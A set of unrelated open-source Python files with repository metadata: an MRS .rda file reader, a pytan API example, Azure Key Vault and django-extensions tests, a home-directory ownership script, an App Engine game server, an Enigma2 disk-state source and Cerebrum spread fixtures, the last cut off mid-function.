"MRFrequency", "MagneticFieldStrength", "FlipAngle", "SliceThickness",
"FoVHeight", "FoVWidth", "PercentOfRectFoV", "PixelSpacingRow",
"PixelSpacingCol", "VOIPositionSag", "VOIPositionCor",
"VOIPositionTra", "VOIThickness", "VOIPhaseFOV", "VOIReadoutFOV",
"VOIReadoutVOV", "VOINormalSag", "VOINormalCor", "VOINormalTra",
"VOIRotationInPlane", "FoV3D", "PixelSpacing3D"],
"integers": ["SeriesNumber", "InstanceNumber", "AcquisitionNumber", "NumOfPhaseEncodingSteps",
"NumberOfRows", "NumberOfColumns", "VectorSize", "EchoNumber",
"NumberOf3DParts", "HammingFilterWidth", "NumberOfEchoes"],
"strings": ["PatientID", "PatientName", "StudyDescription", "PatientBirthDate",
"StudyDate", "StudyTime", "PatientAge", "SeriesDate", "SeriesTime",
"SeriesDescription", "ProtocolName", "PatientPosition", "ModelName",
"StationName", "InstitutionName", "DeviceSerialNumber", "InstanceDate",
"InstanceTime", "InstanceComments", "SequenceName", "SequenceDescription",
"Nucleus", "TransmitCoil", "PatientSex", "HammingFilter", "FrequenceCorrection"],
"float_arrays": ["PositionVector", "RowVector", "ColumnVector"],
"integer_arrays": ["CSIMatrixSize", "CSIMatrixSizeOfScan", "CSIGridShift"],
"string_arrays": ["SoftwareVersion"],
"dictionaries": ["TransmitRefAmplitude"]
}
def load_rda(filename):
header_dict = {}
with open(filename, 'rb') as fin:
header_line = fin.readline().strip()
if header_line != b">>> Begin of header <<<":
raise Exception("Error reading file {} as a .rda".format(filename))
header_line = fin.readline().strip().decode('windows-1252')
while header_line != ">>> End of header <<<":
key, value = map(str.strip, header_line.split(":", 1))
if key in rda_types["strings"]:
header_dict[key] = value
elif key in rda_types["integers"]:
header_dict[key] = int(value)
elif key in rda_types["floats"]:
header_dict[key] = float(value)
elif "[" in key and "]" in key:
# could be a dict or a list
key, index = re.split("\]|\[", key)[0:2]
if key in rda_types["dictionaries"]:
if key not in header_dict:
header_dict[key] = {}
header_dict[key][index] = value
else:
# not a dictionary, must be a list
if key in rda_types["float_arrays"]:
value = float(value)
elif key in rda_types["integer_arrays"]:
value = int(value)
index = int(index)
# make sure there is a list in the header_dict, with enough entries
if not key in header_dict:
header_dict[key] = []
while len(header_dict[key]) <= index:
header_dict[key].append(0)
header_dict[key][index] = value
header_line = fin.readline().strip().decode('windows-1252')
# now we can read the data
data = fin.read()
# the shape of the data in slice, column, row, time format
data_shape = header_dict["CSIMatrixSize"][::-1]
data_shape.append(header_dict["VectorSize"])
data_shape = numpy.array(data_shape)
data_size = numpy.prod(data_shape) * 16 # each data point is a complex double, 16 bytes
if data_size != len(data):
raise ValueError("Error reading file {}: expected {} bytes of data, got {}".format(filename, data_size, len(data)))
# unpack the data into complex numbers
data_as_floats = struct.unpack("<{}d".format(numpy.prod(data_shape) * 2), data)
float_iter = iter(data_as_floats)
complex_iter = (complex(r, i) for r, i in zip(float_iter, float_iter))
complex_data = numpy.fromiter(complex_iter, "complex64", int(numpy.prod(data_shape)))
complex_data = numpy.reshape(complex_data, data_shape).squeeze()
# some .rda files have a misnamed field, correct this here
if "VOIReadoutFOV" not in header_dict:
if "VOIReadoutVOV" in header_dict:
header_dict["VOIReadoutFOV"] = header_dict.pop("VOIReadoutVOV")
# combine positional elements in the header
voi_size = (header_dict["VOIReadoutFOV"],
header_dict["VOIPhaseFOV"],
header_dict["VOIThickness"])
voi_center = (header_dict["VOIPositionSag"],
header_dict["VOIPositionCor"],
header_dict["VOIPositionTra"])
voxel_size = (header_dict["PixelSpacingCol"],
header_dict["PixelSpacingRow"],
header_dict["PixelSpacing3D"])
x_vector = numpy.array(header_dict["RowVector"])
y_vector = numpy.array(header_dict["ColumnVector"])
to_scanner = transformation_matrix(x_vector, y_vector, numpy.array(voi_center), voxel_size)
# put useful components from the header in the metadata
metadata = {
"voi_size": voi_size,
"position": voi_center,
"voxel_size": voxel_size,
"protocol": header_dict["ProtocolName"],
"to_scanner": to_scanner,
"from_scanner": numpy.linalg.inv(to_scanner)
}
return MRSData(complex_data,
header_dict["DwellTime"] * 1e-6,
header_dict["MRFrequency"],
te=header_dict["TE"],
transform=to_scanner,
metadata=metadata)
|
bennyrowland/suspect
|
suspect/io/rda.py
|
Python
|
mit
| 6,095
|
# import the basic python packages we need
import os
import sys
import tempfile
import pprint
import traceback
# disable python from generating a .pyc file
sys.dont_write_bytecode = True
# change me to the path of pytan if this script is not running from EXAMPLES/PYTAN_API
pytan_loc = "~/gh/pytan"
pytan_static_path = os.path.join(os.path.expanduser(pytan_loc), 'lib')
# Determine our script name, script dir
my_file = os.path.abspath(sys.argv[0])
my_dir = os.path.dirname(my_file)
# try to automatically determine the pytan lib directory by assuming it is in '../../lib/'
parent_dir = os.path.dirname(my_dir)
pytan_root_dir = os.path.dirname(parent_dir)
lib_dir = os.path.join(pytan_root_dir, 'lib')
# add pytan_loc and lib_dir to the PYTHONPATH variable
path_adds = [lib_dir, pytan_static_path]
[sys.path.append(aa) for aa in path_adds if aa not in sys.path]
# import pytan
import pytan
# create a dictionary of arguments for the pytan handler
handler_args = {}
# establish our connection info for the Tanium Server
handler_args['username'] = "Administrator"
handler_args['password'] = "Tanium2015!"
handler_args['host'] = "10.0.1.240"
handler_args['port'] = "443" # optional
# optional, level 0 is no output except warnings/errors
# level 1 through 12 are more and more verbose
handler_args['loglevel'] = 1
# optional, use a debug format for the logging output (uses two lines per log entry)
handler_args['debugformat'] = False
# optional, this saves all response objects to handler.session.ALL_REQUESTS_RESPONSES
# very useful for capturing the full exchange of XML requests and responses
handler_args['record_all_requests'] = True
# instantiate a handler using all of the arguments in the handler_args dictionary
print "...CALLING: pytan.handler() with args: {}".format(handler_args)
handler = pytan.Handler(**handler_args)
# print out the handler string
print "...OUTPUT: handler string: {}".format(handler)
# setup the arguments for the handler() class
kwargs = {}
kwargs["objtype"] = u'userrole'
kwargs["id"] = 1
print "...CALLING: handler.get with args: {}".format(kwargs)
response = handler.get(**kwargs)
print "...OUTPUT: Type of response: ", type(response)
print "...OUTPUT: print of response:"
print response
# call the export_obj() method to convert response to JSON and store it in out
export_kwargs = {}
export_kwargs['obj'] = response
export_kwargs['export_format'] = 'json'
print "...CALLING: handler.export_obj() with args {}".format(export_kwargs)
out = handler.export_obj(**export_kwargs)
# trim the output if it is more than 15 lines long
if len(out.splitlines()) > 15:
out = out.splitlines()[0:15]
out.append('..trimmed for brevity..')
out = '\n'.join(out)
print "...OUTPUT: print the objects returned in JSON format:"
print out
|
tanium/pytan
|
BUILD/doc/source/examples/get_userrole_by_id_code.py
|
Python
|
mit
| 2,787
|
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
from azure.keyvault.keys import KeyClient
from azure.keyvault.keys.crypto import CryptographyClient
from _shared.helpers import mock
def test_key_client_close():
transport = mock.MagicMock()
client = KeyClient(vault_url="https://localhost", credential=object(), transport=transport)
client.close()
assert transport.__enter__.call_count == 0
assert transport.__exit__.call_count == 1
def test_key_client_context_manager():
transport = mock.MagicMock()
client = KeyClient(vault_url="https://localhost", credential=object(), transport=transport)
with client:
assert transport.__enter__.call_count == 1
assert transport.__enter__.call_count == 1
assert transport.__exit__.call_count == 1
def test_crypto_client_close():
transport = mock.MagicMock()
client = CryptographyClient(key="https://localhost/a/b/c", credential=object(), transport=transport)
client.close()
assert transport.__enter__.call_count == 0
assert transport.__exit__.call_count == 1
def test_crypto_client_context_manager():
transport = mock.MagicMock()
client = CryptographyClient(key="https://localhost/a/b/c", credential=object(), transport=transport)
with client:
assert transport.__enter__.call_count == 1
assert transport.__enter__.call_count == 1
assert transport.__exit__.call_count == 1
|
Azure/azure-sdk-for-python
|
sdk/keyvault/azure-keyvault-keys/tests/test_context_manager.py
|
Python
|
mit
| 1,517
|
# -*- coding: utf-8 -*-
import os, sys, shutils
if len(sys.argv) <= 1:
print('debe llamar al sistema usando : ')
print('python3 ' + sys.argv[0] + ' usuario dni')
exit(1)
usuario = sys.argv[1]
dni = sys.argv[2]
os.chdir('/home')
os.rename(usuario,dni)
os.chdir('/home/samba/profiles')
os.rename(usuario,dni)
"""
-- cambiar los permisos al directorio --
/home/dni
/home/samba/profiles/dni
"""
for ruta, dirs, archivos in os.walk('/home/' + dni):
shutil.chown(ruta, dni, 'root')
for archivo in archivos:
shutil.chown(archivo, dni, 'root')
for ruta, dirs, archivos in os.walk('/home/samba/profiles/' + dni):
shutil.chown(ruta, dni, 'root')
for archivo in archivos:
shutil.chown(archivo, dni, 'root')
|
pablodanielrey/python
|
gosa/changeOwnerDomain.py
|
Python
|
gpl-3.0
| 760
|
import urllib
import logging
import random
from datetime import datetime
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext import db
from google.appengine.ext.db import Key
class Move(db.Model):
move = db.StringProperty()
ctime = db.DateTimeProperty(auto_now_add=True)
para = db.StringProperty()
charm_hand = db.StringProperty()
charm_gesture = db.StringProperty()
has_para = db.IntegerProperty()
has_charm = db.IntegerProperty()
class Duel(db.Model):
chicken = db.IntegerProperty()
ctime = db.DateTimeProperty(auto_now_add=True)
now_turn = db.IntegerProperty()
received_count = db.IntegerProperty()
level = db.StringProperty()
class Account(db.Model):
ctime = db.DateTimeProperty(auto_now_add=True)
nonce = db.StringProperty()
level = db.IntegerProperty()
class User(db.Model):
ctime = db.DateTimeProperty(auto_now_add=True)
atime = db.DateTimeProperty(auto_now_add=True)
name = db.StringProperty()
level = db.IntegerProperty()
state = db.IntegerProperty()
"""
States:
0 I'm idle.
1 I propose a duel.
2 Somebody accepted my challenge.
3 I acknowledge someone's acceptance.
4 I accepted somebody's challenge.
9 I fled a duel.
"""
arg = db.StringProperty()
duel = db.StringProperty()
class MainPage(webapp.RequestHandler):
def get(self):
if "" == self.request.query_string:
self.response.out.write("2")
return
cmd = self.request.get("c")
"""
if "deldeldel" == cmd:
logging.info("cleanup")
stuff = db.GqlQuery("SELECT * FROM Move")
for thing in stuff:
thing.delete()
return
"""
def logoff(userkey):
def del_user(userkey):
user = db.get(userkey)
if not user:
return None
user.delete()
return user
u = db.run_in_transaction(del_user, userkey)
if None == u:
logging.error("User already deleted.")
return
def del_acct():
acct = db.get(Key.from_path("Account", "n:" + u.name))
if not acct:
logging.error("Missing account for user.")
return
acct.delete()
db.run_in_transaction(del_acct)
if "l" == cmd: # Login.
name = urllib.unquote(self.request.get("a"))
b = self.request.get("b")
if "" == b:
logging.error("No level supplied.")
self.response.out.write("Error: No level supplied.")
return
level = int(b)
logging.info("login: " + name)
# TODO: Handle other bad names.
if "" == name:
logging.error("Empty name.")
self.response.out.write("Error: Empty name.")
return
def handle_login():
acct = db.get(Key.from_path("Account", "n:" + name))
if not acct:
acct = Account(key_name="n:" + name, level=level,
nonce="%X" % random.getrandbits(64))
acct.put()
return acct.nonce
else:
return ""
nonce = db.run_in_transaction(handle_login)
if "" == nonce:
self.response.out.write("Error: Name already in use.")
else:
user = User(key_name="n:" + nonce, name=name, state=0, arg="")
user.put()
self.response.out.write(nonce)
return
if "L" == cmd: # Logoff.
nonce = self.request.get("i")
logging.info("logout: " + nonce)
logoff(Key.from_path("User", "n:" + nonce))
return
if "r" == cmd: # Lobby refresh.
nonce = self.request.get("i")
def heartbeat():
user = db.get(Key.from_path("User", "n:" + nonce))
if not user: return False, None
user.atime = datetime.now()
# Someone accepted the duel.
if 2 == user.state:
user.state = 3
user.put()
return True, user
user.put()
return False, user
flag, user = db.run_in_transaction(heartbeat)
if not user:
self.response.out.write("Error: No such user ID.")
return
if flag:
self.response.out.write("\n" + user.arg + "\n" + user.duel)
return
users = db.GqlQuery("SELECT * FROM User")
for u in users:
self.response.out.write(u.name + '\n')
self.response.out.write(unicode(u.state) + '\n')
self.response.out.write(u.arg + '\n')
if 0 == u.state or 1 == u.state:
if user.atime > u.atime and (user.atime - u.atime).seconds >= 12:
logging.info(u.name + " timeout: " + unicode((user.atime - u.atime).seconds))
logoff(u.key())
elif 9 == u.state:
# TODO: When net games become more robust, punish fleeing wizards
# with longer login bans.
if user.atime > u.atime and (user.atime - u.atime).seconds >= 4:
logging.info(u.name + " timeout: " + unicode((user.atime - u.atime).seconds))
logoff(u.key())
# TODO: Uptime user.atime in SetMove and lower timeout to a few minutes.
elif user.atime > u.atime and (user.atime - u.atime).seconds >= 2048:
logging.info(u.name + " timeout: " + unicode((user.atime - u.atime).seconds))
logoff(u.key())
return
if "n" == cmd: # New duel.
logging.info("New duel.")
a = self.request.get("a")
if "" == a:
logging.error("No level supplied.")
self.response.out.write("Error: No level supplied.")
return
level = int(a)
if level < 1 or level > 5:
logging.error("Bad level.")
self.response.out.write("Error: Bad level.")
return
nonce = self.request.get("i")
def new_duel():
user = db.get(Key.from_path("User", "n:" + nonce))
if not user: return -2
user.atime = datetime.now()
if 0 == user.state:
user.state = 1
user.arg = a
user.put()
return 0
user.put()
return -1
status = db.run_in_transaction(new_duel)
if -2 == status:
logging.error("No such user.")
self.response.out.write("Error: No such user.")
elif -1 == status:
logging.error("User already started duel.")
self.response.out.write("Error: Already started duel.")
else:
self.response.out.write("OK")
return
if "N" == cmd: # Accept duel.
logging.info("Accept duel.")
a = urllib.unquote(self.request.get("a"))
if "" == a:
logging.error("Error: No opponent supplied.")
return
nonce = self.request.get("i")
duelid = "%X" % random.getrandbits(64)
def mark_user():
user = db.get(Key.from_path("User", "n:" + nonce))
if not user:
return 0, "", None, -1
user.atime = datetime.now()
origstate = user.state
origarg = user.arg
# Can't accept a duel if you were advertising one and someone just
# accepted (but you don't know yet). Also can't accept a duel if
# already in one.
if 1 != user.state and 0 != user.state:
return 0, "", None, -2
user.state = 4
user.arg = a
user.duel = duelid
user.put()
return origstate, origarg, user, 0
origstate, origarg, user, status = db.run_in_transaction(mark_user)
if -1 == status:
self.response.out.write("Error: No such user ID.")
return
if -2 == status:
logging.warning("Already dueling. Ignoring.")
return
def restore():
def restore_state_arg(i, s):
user = db.get(Key.from_path("User", "n:" + nonce))
if user:
user.state = i
user.arg = s
user.put()
db.run_in_transaction(restore_state_arg, origstate, origarg)
return
acct = db.get(Key.from_path("Account", "n:" + a))
if not acct:
restore()
self.response.out.write("Error: Opponent unavailable.")
return
def accept_duel():
opp = db.get(Key.from_path("User", "n:" + acct.nonce))
if not opp: return ""
if 1 != opp.state: return ""
opp.state = 2
level = opp.arg
opp.arg = user.name
opp.duel = duelid
opp.put()
return level
level = db.run_in_transaction(accept_duel)
if "" == level:
self.response.out.write("Error: Opponent unavailable.")
restore()
logging.error("accept_duel failed.")
return
duel = Duel(key_name = "g:" + duelid,
level = level,
now_turn = 0,
received_count = 0)
duel.put()
self.response.out.write(duelid)
logging.info("Response: " + duelid)
return
gamename = self.request.get("g")
if "f" == cmd:
logging.info("Game " + gamename + " finished.")
nonce = self.request.get("i")
def restate_user():
user = db.get(Key.from_path("User", "n:" + nonce))
if not user:
return None
user.atime = datetime.now()
user.state = 0
user.put()
return user
user = db.run_in_transaction(restate_user)
if not user:
self.response.out.write("Error: No such user ID.")
else:
self.response.out.write("OK")
def del_game():
game = Duel.get_by_key_name("g:" + gamename)
if game:
game.delete() # TODO: Also delete moves.
db.run_in_transaction(del_game)
return
game = Duel.get_by_key_name("g:" + gamename)
if not game:
logging.error("No such game: " + gamename)
self.response.out.write("Error: No such game.")
return
gamekey = game.key()
playerid = self.request.get("i")
if "D" == cmd:
def set_chicken():
game = db.get(gamekey)
if game:
game.chicken = 1
game.put()
db.run_in_transaction(set_chicken)
logging.info(gamename + ":" + playerid + " flees!")
def chicken_user():
user = db.get(Key.from_path("User", "n:" + playerid))
if not user:
return None
user.atime = datetime.now()
user.state = 9
user.put()
return user
db.run_in_transaction(chicken_user)
#logoff(Key.from_path("User", "n:" + playerid))
self.response.out.write("Chicken!")
return
if ('0' != playerid) and ('1' != playerid):
logging.error("Bad player ID.")
self.response.out.write("Error: Bad player ID.")
return
def CommandSetMove():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
a = self.request.get("a")
if "" == a:
logging.error("Error: Bad move.")
return
logging.info("SetMove " + gamename + ":" + turn_index +
":" + playerid + " " + a)
moveid = "m:" + gamename + turn_index + playerid
move = Move.get_by_key_name(moveid)
if move:
logging.warning("Move sent twice: ignored.")
self.response.out.write("OK")
return
else:
move = Move(key_name = moveid,
has_charm = 0,
has_para = 0)
move.move = a
move.put()
turn_int = int(turn_index)
def increment_received_count():
game = db.get(gamekey)
if game.now_turn == turn_int:
if 2 == game.received_count:
logging.error("received_count > 2!")
else:
game.received_count = game.received_count + 1
elif game.now_turn == turn_int - 1:
if 2 > game.received_count:
logging.error("incrementing turn though received_count < 2!")
game.now_turn = turn_int
game.received_count = 1
elif game.now_turn > turn_int:
logging.error("received ancient move!")
elif game.now_turn < turn_int - 1:
logging.error("received future move!")
game.put()
db.run_in_transaction(increment_received_count)
logging.info("rcount " + unicode(db.get(gamekey).received_count))
self.response.out.write("OK")
def CommandGetMove():
if game.chicken:
self.response.out.write('CHICKEN')
# TODO: Destroy this game.
return
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
turn_int = int(turn_index)
if game.now_turn > turn_int or (game.now_turn == turn_int and 2 == game.received_count):
logging.info("GetMove " + gamename + ":" + turn_index +
":" + playerid + " " + unicode(game.received_count))
moveid = "m:" + gamename + turn_index + unicode(1 - int(playerid))
move = Move.get_by_key_name(moveid)
if not move:
logging.error('Error: Cannot find move!')
else:
self.response.out.write(move.move)
else:
self.response.out.write('-')
return
def CommandSetPara():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
target = self.request.get("a")
if "" == target:
logging.error("Error: Bad paralysis target.")
return
if "0" == target:
targetid = playerid
else:
targetid = unicode(1 - int(playerid))
gesture = self.request.get("b")
if "" == gesture:
logging.error("Error: Bad paralysis gesture.")
return
moveid = "m:" + gamename + turn_index + targetid
logging.info("SetPara " + moveid)
move = Move.get_by_key_name(moveid)
if not move:
logging.error('Error: Cannot find move!')
return
if (1 == move.has_para):
logging.error("Error: Already received paralysis.")
return
def put_para(key):
move = db.get(key)
move.para = gesture
move.has_para = 1
move.put()
db.run_in_transaction(put_para, move.key())
self.response.out.write("OK")
return
def CommandGetPara():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
target = self.request.get("a")
if "" == target:
logging.error("Error: Bad paralysis target.")
return
if "0" == target:
targetid = playerid
else:
targetid = unicode(1 - int(playerid))
moveid = "m:" + gamename + turn_index + targetid
move = Move.get_by_key_name(moveid)
if not move:
logging.error('Error: Cannot find move!')
return
if 0 == move.has_para:
self.response.out.write("-")
else:
self.response.out.write(move.para)
return
def CommandSetCharm():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
# This is unnecessary as we always assume target is opponent.
target = self.request.get("a")
if "" == target:
self.response.out.write("Error: Bad charm target.")
return
s = self.request.get("b")
if "" == s:
self.response.out.write("Error: Bad charm choices.")
return
logging.info("SetCharm " + gamename + ":" + playerid + " " + target + " " + s)
moveid = "m:" + gamename + turn_index + unicode(1 - int(playerid))
logging.info("Charm " + moveid)
move = Move.get_by_key_name(moveid)
if not move:
self.response.out.write('Error: Cannot find move!')
return
if (1 == move.has_charm):
self.response.out.write("Error: Already received charm.")
return
def put_charm(key):
move = db.get(key)
move.charm_hand = s[0]
move.charm_gesture = s[1]
move.has_charm = 1
move.put()
db.run_in_transaction(put_charm, move.key())
self.response.out.write("OK")
return
def CommandGetCharmHand():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
moveid = "m:" + gamename + turn_index + playerid
move = Move.get_by_key_name(moveid)
if not move:
logging.error('Error: Cannot find move!')
return
if 0 == move.has_charm:
self.response.out.write("-")
else:
self.response.out.write(move.charm_hand)
return
def CommandGetCharmGesture():
turn_index = self.request.get("j")
if "" == turn_index:
logging.error("Error: No turn index.")
return
moveid = "m:" + gamename + turn_index + playerid
move = Move.get_by_key_name(moveid)
if not move:
logging.error('Error: Cannot find move!')
return
if 0 == move.has_charm:
self.response.out.write("-")
else:
self.response.out.write(move.charm_gesture)
return
def CommandBad():
logging.error("Error: Bad command.")
return
{'m' : CommandSetMove,
'g' : CommandGetMove,
'p' : CommandSetPara,
'q' : CommandGetPara,
'C' : CommandSetCharm,
'H' : CommandGetCharmHand,
'G' : CommandGetCharmGesture,
}.get(cmd, CommandBad)()
application = webapp.WSGIApplication(
[('/', MainPage)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
|
blynn/spelltapper
|
app/spelltapper.py
|
Python
|
gpl-3.0
| 15,729
|
import tkinter
def display():
name = textVar.get()
ch = choice.get()
if ch == 1:
message = "Hello "+name
elif ch == 2:
message = "Goodbye "+name
else:
message = ""
messageLabel.configure(text=message)
top = tkinter.Tk()
textVar = tkinter.StringVar("")
textEntry = tkinter.Entry(top,textvariable=textVar,width=12)
textEntry.grid(row=0,column=0)
messageLabel = tkinter.Label(top,text="",width=12)
messageLabel.grid(row=1,column=0)
choice = tkinter.IntVar(0)
helloButton = tkinter.Radiobutton(top,text="Hello",
variable=choice,value=1,command=display)
helloButton.grid(row=1,column=1)
goodbyeButton = tkinter.Radiobutton(top,text="Goodbye",
variable=choice,value=2,command=display)
goodbyeButton.grid(row=1,column=2)
quitButton = tkinter.Button(top,text="Quit",command=top.destroy)
quitButton.grid(row=1,column=3)
tkinter.mainloop()
|
CajetanP/code-learning
|
Python/UofG/Year1/Semester2/gui_apps.py
|
Python
|
mit
| 884
|
# -*- coding: utf-8 -*-
import logging
import sys
from io import StringIO
from django.core.management import call_command
from django.test import TestCase
from unittest.mock import patch
class RunJobTests(TestCase):
def setUp(self):
sys.stdout = StringIO()
sys.stderr = StringIO()
# Remove old loggers, since utils.setup_logger does not clean up after itself
logger = logging.getLogger("django_extensions.management.commands.runjob")
for handler in list(logger.handlers):
logger.removeHandler(handler)
def test_runs(self):
# lame test...does it run?
call_command('runjob', 'cache_cleanup', verbosity=2)
self.assertIn("Executing job: cache_cleanup (app: None)", sys.stdout.getvalue())
def test_sample_job(self):
call_command('runjob', 'sample_job', verbosity=2)
self.assertIn("Executing job: sample_job (app: None)", sys.stdout.getvalue())
self.assertIn("executing empty sample job", sys.stdout.getvalue())
def test_list_jobs(self):
call_command('runjob', '-l', verbosity=2)
self.assertRegex(sys.stdout.getvalue(), "tests.testapp +- sample_job +- +- My sample job.\n")
def test_list_jobs_appconfig(self):
with self.modify_settings(INSTALLED_APPS={
'append': 'tests.testapp.apps.TestAppConfig',
'remove': 'tests.testapp',
}):
call_command('runjob', '-l', verbosity=2)
self.assertRegex(sys.stdout.getvalue(), "tests.testapp +- sample_job +- +- My sample job.\n")
def test_runs_appconfig(self):
with self.modify_settings(INSTALLED_APPS={
'append': 'tests.testapp.apps.TestAppConfig',
'remove': 'tests.testapp',
}):
call_command('runjob', 'sample_job', verbosity=2)
self.assertIn("Executing job: sample_job (app: None)", sys.stdout.getvalue())
self.assertIn("executing empty sample job", sys.stdout.getvalue())
def test_should_print_that_job_not_found(self):
call_command('runjob', 'test_job', verbosity=2)
self.assertIn("Error: Job test_job not found", sys.stdout.getvalue())
def test_should_print_that_applabel_not_found(self):
call_command('runjob', 'test_job', 'test_app', verbosity=2)
self.assertIn("Error: Job test_app for applabel test_job not found", sys.stdout.getvalue())
def test_should_always_print_list_option_usage_if_job_or_applabel_not_found(self):
call_command('runjob', 'test_job', verbosity=2)
self.assertIn("Use -l option to view all the available jobs", sys.stdout.getvalue())
@patch('django_extensions.management.commands.runjob.get_job')
def test_should_print_traceback(self, m_get_job):
m_get_job.return_value.return_value.execute.side_effect = Exception
call_command('runjob', 'test_job', 'test_app')
self.assertIn("ERROR OCCURED IN JOB: test_app (APP: test_job)", sys.stdout.getvalue())
self.assertIn("Traceback (most recent call last):", sys.stdout.getvalue())
|
django-extensions/django-extensions
|
tests/management/commands/test_runjob.py
|
Python
|
mit
| 3,083
|
from Source import Source
from Components.Element import cached
from Components.Harddisk import harddiskmanager
from Components.config import config
from enigma import eTimer
from Components.SystemInfo import SystemInfo
class HddState(Source):
ALL = 0
INTERNAL = 1
INTERNAL_HDD = 2
INTERNAL_SSD = 3
EXTERNAL = 4
def __init__(self, session, poll=600, type=0, diskName=True, allVisible=False):
Source.__init__(self)
self.session = session
if type == 1:
self.type = self.INTERNAL
elif type == 2:
self.type = self.INTERNAL_HDD
elif type == 3:
self.type = self.INTERNAL_SSD
elif type == 4:
self.type = self.EXTERNAL
else:
self.type = self.ALL
self.isSleeping = False
self.state_text = ""
self.isHDD()
self.diskName = diskName
self.allVisible = allVisible
self.standby_time = poll
self.timer = eTimer()
self.timer.callback.append(self.updateHddState)
self.idle_time = int(config.usage.hdd_standby.value)
config.usage.hdd_standby.addNotifier(self.setStandbyTime, initial_call=False)
if self.hdd_list:
self.updateHddState(force=True)
if self.onPartitionAddRemove not in harddiskmanager.on_partition_list_change:
harddiskmanager.on_partition_list_change.append(self.onPartitionAddRemove)
def onPartitionAddRemove(self, state, part):
self.timer.stop()
self.isHDD()
self.updateHddState(force=True)
def updateHddState(self, force=False):
prev_state = self.isSleeping
string = ""
state = False
if self.hdd_list:
for hdd in self.hdd_list:
if string and self.diskName:
string += " "
if (hdd[1].max_idle_time or force) and not hdd[1].isSleeping():
state = True
if self.diskName:
color = state and "\c0000??00" or "\c00????00"
string += color
name = "I"
if not hdd[1].internal:
name = "E"
elif not hdd[1].rotational:
name = "S"
string += name
if not state:
if self.allVisible:
if not string:
string = "\c0000??00"
string += "standby"
self.isSleeping = False
idle = self.standby_time
else:
if not string:
string = "\c0000??00"
string += "active"
self.isSleeping = True
idle = self.idle_time
if self.idle_time:
timeout = len(self.hdd_list) > 1 and self.standby_time or idle
self.timer.start(timeout * 100, True)
else:
self.isSleeping = False
if string:
string = "Disk state: " + string
self.state_text = string
if prev_state != self.isSleeping or force:
if SystemInfo["LCDsymbol_hdd"]:
open(SystemInfo["LCDsymbol_hdd"], "w").write(self.isSleeping and "1" or "0")
self.changed((self.CHANGED_ALL,))
def setStandbyTime(self, cfgElem):
self.timer.stop()
self.idle_time = int(cfgElem.value)
self.updateHddState(force=True)
def isHDD(self):
self.hdd_list = []
if harddiskmanager.HDDCount():
for hdd in harddiskmanager.HDDList():
if hdd[1].idle_running and not hdd[1].card:
if self.type == self.ALL:
self.hdd_list.append(hdd)
elif self.type == self.INTERNAL:
if hdd[1].internal:
self.hdd_list.append(hdd)
elif self.type == self.INTERNAL_HDD:
if hdd[1].internal and hdd[1].rotational:
self.hdd_list.append(hdd)
elif self.type == self.INTERNAL_SSD:
if hdd[1].internal and not hdd[1].rotational:
self.hdd_list.append(hdd)
elif self.type == self.EXTERNAL:
if not hdd[1].internal:
self.hdd_list.append(hdd)
def doSuspend(self, suspended):
pass
@cached
def getText(self):
return self.state_text
text = property(getText)
@cached
def getBoolean(self):
return self.isSleeping and True or False
boolean = property(getBoolean)
@cached
def getValue(self):
return self.isSleeping
value = property(getValue)
|
athoik/enigma2
|
lib/python/Components/Sources/HddState.py
|
Python
|
gpl-2.0
| 3,740
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Basic tests for Cerebrum.Entity.EntitySpread. """
import pytest
@pytest.fixture
def entity_spread(Spread, entity_type):
code = Spread('f303846618175b16',
entity_type,
description='Test spread for entity_type')
code.insert()
return code
@pytest.fixture
def entity_spread_alt(Spread, entity_type):
code = Spread('b36b563d6a4db0e5',
entity_type,
description='Second test spread for entity_type')
code.insert()
return code
@pytest.fixture
def Entity(entity_module):
u""" Branch and test each subtype of Entity. """
return getattr(entity_module, 'EntitySpread')
@pytest.fixture
def entity_obj(database, Entity):
u""" An instance of Entity, with database. """
return Entity(database)
@pytest.fixture
def entity_simple(entity_obj, entity_type):
u""" entity_obj, but populated. """
entity_obj.populate(entity_type)
entity_obj.write_db()
return entity_obj
@pytest.fixture
def entity(entity_simple, entity_spread, entity_spread_alt):
u""" entity_simple, but with spreads. """
entity_simple.add_spread(entity_spread)
entity_simple.add_spread(entity_spread_alt)
return entity_simple
@pytest.fixture
def entities(entity_obj, entity_type, entity_spread, entity_spread_alt):
u""" Entity info on four entities with different sets of spreads. """
entities = list()
spread_dist = [
(),
(entity_spread, ),
(entity_spread, entity_spread_alt, ),
(entity_spread_alt, ), ]
for spreads in spread_dist:
try:
entry = dict()
entity_obj.populate(entity_type)
entity_obj.write_db()
for spread in spreads:
entity_obj.add_spread(spread)
entry = {
'entity_id': entity_obj.entity_id,
'entity_type': entity_obj.entity_type,
'spreads': spreads, }
entities.append(entry)
except Exception:
entity_obj._db.rollback()
raise
finally:
entity_obj.clear()
return entities
def test_delete_with_spread(entity):
from Cerebrum.Errors import NotFoundError
entity_id = entity.entity_id
entity.delete()
entity.clear()
with pytest.raises(NotFoundError):
entity.find(entity_id)
def test_get_spread(entity, entity_spread, entity_spread_alt):
spreads = [row['spread'] for row in entity.get_spread()]
assert all(int(spread) in spreads
for spread in (entity_spread, entity_spread_alt))
def test_has_spread(entity_simple, entity_spread, entity_spread_alt):
entity_simple.add_spread(entity_spread_alt)
assert entity_simple.has_spread(entity_spread_alt)
assert not entity_simple.has_spread(entity_spread)
entity_simple.add_spread(entity_spread)
assert entity_simple.has_spread(entity_spread)
def test_delete_spread(entity, entity_spread, entity_spread_alt):
entity.delete_spread(entity_spread)
assert not entity.has_spread(entity_spread)
assert entity.has_spread(entity_spread_alt)
def test_list_spreads(entity, entity_type, entity_spread, entity_spread_alt):
columns = ['spread_code', 'spread', 'description', 'entity_type',
'entity_type_str']
all_spreads = entity.list_spreads()
